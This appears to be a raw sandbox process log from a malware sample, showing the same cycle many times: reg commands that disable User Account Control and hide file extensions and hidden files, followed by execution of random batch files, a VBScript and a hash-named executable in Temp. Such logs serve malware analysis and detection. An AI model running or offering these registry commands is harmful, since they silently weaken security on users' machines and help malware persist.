reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\UIEYMAQA.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\WqwsMoow.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\gewwEAsE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\KssYcYIU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\GOYEcoco.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\VOUYokII.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\PaMwMUEE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\XesIckcs.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\dcAMQUAE.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\qmEYYAoo.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\OQUMQYII.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\OOkQcQMI.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\GYEcsEss.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\TqAkEMwY.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\LYggUQsQ.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\jiYAEIws.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\lmksYswg.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\ksosscUM.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\WgUoMoMo.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\koIwcsIw.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\sGgIMQkU.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\VesggMgs.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\JKkYEIcc.bat" "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe""
C:\Windows\SysWOW64\cscript.exe
cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN"
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN.exe
C:\Users\Admin\AppData\Local\Temp\95732cd02e4cb60c30d720c624d5dddf0e289eb67ba6972a35731e863d65290cN
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
C:\Windows\SysWOW64\reg.exe
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
